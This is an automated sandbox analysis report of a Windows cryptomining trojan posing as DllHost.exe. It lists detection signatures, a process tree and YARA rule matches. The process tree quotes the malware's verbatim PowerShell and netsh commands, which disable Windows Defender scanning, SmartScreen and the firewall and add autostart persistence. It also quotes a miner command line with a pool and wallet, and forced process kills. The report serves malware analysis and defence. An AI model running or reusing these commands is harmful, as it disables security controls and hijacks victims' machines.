Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DllHost.exe

Overview

General Information

Sample Name:DllHost.exe
Analysis ID:658699
MD5:6368031626da1f0d51bcac43104b123f
SHA1:5a340a1a3edc0bf03526e677a0415ffd156c139c
SHA256:11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Uses netsh to modify the Windows network and firewall settings
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Detected Stratum mining protocol
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Creates files in the system32 config directory
May check the online IP address of the machine
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for dropped file
Modifies the windows firewall
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
PE file contains more sections than normal
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Enables security privileges
Uses taskkill to terminate processes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Process Tree

  • System is w10x64
  • DllHost.exe (PID: 4352 cmdline: "C:\Users\user\Desktop\DllHost.exe" MD5: 6368031626DA1F0D51BCAC43104B123F)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UpSys.exe (PID: 6748 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
        • UpSys.exe (PID: 2324 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
          • UpSys.exe (PID: 6124 cmdline: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
            • powershell.exe (PID: 1312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 95000560239032BC68B4C2FDFCDEF913)
              • conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5620 cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32)
    • procexp.exe (PID: 6356 cmdline: --url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x MD5: 2D9FB9ED8BEBB55280B81A4652DCFA11)
    • cmd.exe (PID: 6400 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6636 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 6516 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6764 cmdline: taskkill /IM procexp.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 6660 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6804 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6964 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 7068 cmdline: taskkill /IM procexp.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 6992 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3388 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 4420 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 6640 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6840 cmdline: taskkill /IM procexp.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 3816 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 6688 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3412 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 4112 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 2208 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 4364 cmdline: C:\Windows\system32\WerFault.exe -u -p 4352 -s 2560 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 6420 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • System.exe (PID: 6616 cmdline: "C:\ProgramData\MicrosoftNetwork\System.exe" MD5: 6368031626DA1F0D51BCAC43104B123F)
    • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • UpSys.exe (PID: 5924 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
        • UpSys.exe (PID: 6028 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
          • UpSys.exe (PID: 6896 cmdline: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
            • powershell.exe (PID: 6876 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 95000560239032BC68B4C2FDFCDEF913)
              • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 5608 cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32)
    • cmd.exe (PID: 1256 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 3644 cmdline: taskkill /IM procexp.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
    • cmd.exe (PID: 3764 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 6904 cmdline: C:\Windows\system32\WerFault.exe -u -p 6616 -s 2172 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 6796 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1784 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2404 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1252 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6832 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6912 cmdline: C:\Windows\system32\WerFault.exe -pss -s 472 -p 6616 -ip 6616 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • WerFault.exe (PID: 6848 cmdline: C:\Windows\system32\WerFault.exe -pss -s 528 -p 4352 -ip 4352 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • SgrmBroker.exe (PID: 5008 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 3524 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 4140 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • TrustedInstaller.exe (PID: 1356 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • svchost.exe (PID: 5136 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6284 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5112 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
DllHost.exeSUSP_PE_Discord_Attachment_Oct21_1Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)Florian Roth
  • 0x5ea40:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eaf0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5eba0:$x1: https://cdn.discordapp.com/attachments/
  • 0x5ec50:$x1: https://cdn.discordapp.com/attachments/

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\uvbddbmMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
C:\Users\user\AppData\Local\Temp\ygufekoMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
C:\Users\user\AppData\Local\Temp\bjnqnwlMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
C:\Windows\Temp\unmloyrMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
C:\Windows\Temp\klcxefrMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x72b0:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x674:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x70a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x493a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4a6c:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4afe:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x5c7a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x67ce:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x7236:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x72ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x732e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x9c82:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
Click to see the 5 entries

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000002C.00000003.367524176.0000000003151000.00000004.00000020.00020000.00000000.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x6330:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x16340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x25340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x39ba:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3aec:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3b7e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4cfa:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x584e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x62b6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x632e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x63ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x8d02:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf704:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13b8e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x14d0a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1585e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x162c6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x1633e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
00000045.00000003.430480390.00000000030E1000.00000004.00000020.00020000.00000000.sdmpMAL_Sednit_DelphiDownloader_Apr18_2Detects malware from Sednit Delphi Downloader reportFlorian Roth
  • 0x6330:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x16340:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x25b40:$s7: 536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E
  • 0x39ba:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3aec:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x3b7e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x4cfa:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x584e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x62b6:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x632e:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x63ae:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x8d02:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf704:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0xf79a:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x139ca:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
  • 0x13afc:$s9: 5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E
